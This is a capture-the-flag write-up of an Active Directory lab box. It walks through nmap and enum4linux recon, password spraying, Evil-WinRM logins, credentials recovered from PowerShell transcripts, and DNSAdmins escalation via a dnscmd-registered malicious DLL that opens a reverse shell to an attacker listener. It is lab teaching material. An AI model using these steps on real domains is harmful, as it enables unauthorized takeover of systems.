This is the first series of domain controllers I was able to compromise in hack the box. At the time of this writing the box has been retired allowing me to post how I did reconnaissance, enumeration, initial foothold, and privilege escalation. I hope you enjoy reading this as much as I was challenge to hack this box!
Using the following nmap scan to detect open ports and services.
nmap -A -T4 -p- 10.10.10.169
Some import ports to note:
636/TCP LDAP over SSL
3268/TCP LDAP GC (Tells us we are definitely dealing with a domain controller)
5985/TCP WinRM 2.0 (This is important for later)
To start enumerating users I will run enum4linux in Kali and dump to a text file for review.
enum4linux 10.10.10.169 > results.txt
Feel free to read more about this tool in Kali here:
root@kali:~# enum4linux -h enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) Copyright (C) 2011…
I notice that there is a password in the description field for Marko Novak.
This is good for two reasons we can attempt to log into Marko with that password and we can also use hydra to spray each account with that password one single time.
So I will attempt to login as Marko:
Since we were unsuccessful we will spray this password across all user accounts detected from enum4linux. Its easiest to put the account names into a single txt file and spray as seen below:
We have one successful login for melanie over SMB which is great. We have active credentials into this system.
At this point we have a valid password for Melanie. Next we will need to set up Evil WinRM in Kali since it is not installed. Take note how I said earlier that we detected WinRM ports over 5985 as open. With a credential or hash we can immediately drop a shell.
The ultimate WinRM shell for hacking/pentesting This shell is the ultimate WinRM shell for hacking/pentesting. WinRM…
Evil-winrm can easily be installed with the following command.
Next lets log in as melanie.
Next lets check and see what type of rights melanie has on the domain. Its a bummer that she doesn’t have much rights. So lets do some privilege escalation reconnaissance.
Since I am a PowerShell guy I like to start by navigating around through the file system starting from the root of the directory and look for hidden directories that may look interesting. You can do a dir -hidden to find them:
One hidden directory that stands out is a hidden directory called PSTranscripts. This is short for powershell transciption logging. In my humble opinion you should never turn powershell transcription on for a domain. Part of the reason is it is not protected from non-administrators. You will see why in a few on why this is bad.
As I am digging down into the directories we will stumble across a txt file.
Lets go ahead and type it out.
In the transcription logs it looks like Ryan is being good with making backups. He also gave us his password in clear text.
Cool. So lets log in as Ryan next on evil winrm and get what groups he belongs to. As you will see below we now have credentials to a DNS admin. Having rights to DNS admins is money and I will explain why in a few.
3. Privilege Escalation
Doing a quick google search yields and excellent article from Sean Metcalf.
From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration
It's been almost 1.5 years since the Medium post by Shay Ber was published that explained how to execute a DLL as…
According to the article we can leverage dnscmd to register DLL’s of our choosing. Here is the command:
dnscmd.exe /config /serverlevelplugindll \\path\to\dll
So we will make our own malicious dll through msvenom. A few house keeping items with this command.
- Specifies windows x64 reverse shell. Not a meterpreter shell. Although we could do that.
- My host IP at the time is 10.10.14.7 and I am telling my reverse shell to talk back to me on port 4444 on the listener I will set up.
Now that we have a dll created. We need to copy it over to the target domain controller. We will do so using an SMB connection on our kali linux box and remotely executing the dll over smb to achieve a reverse shell back to our kali box over netcat.
DLL injection via smb followed by restarting DNS services:
Reverse shell achieved through netcat listener:
I really enjoyed this active directory box. This one is somewhat realistic especially on privilege escalation. Adding the powershell transcription was a nice touch to as it pointed to weaknesses when doing full scale powershell logging.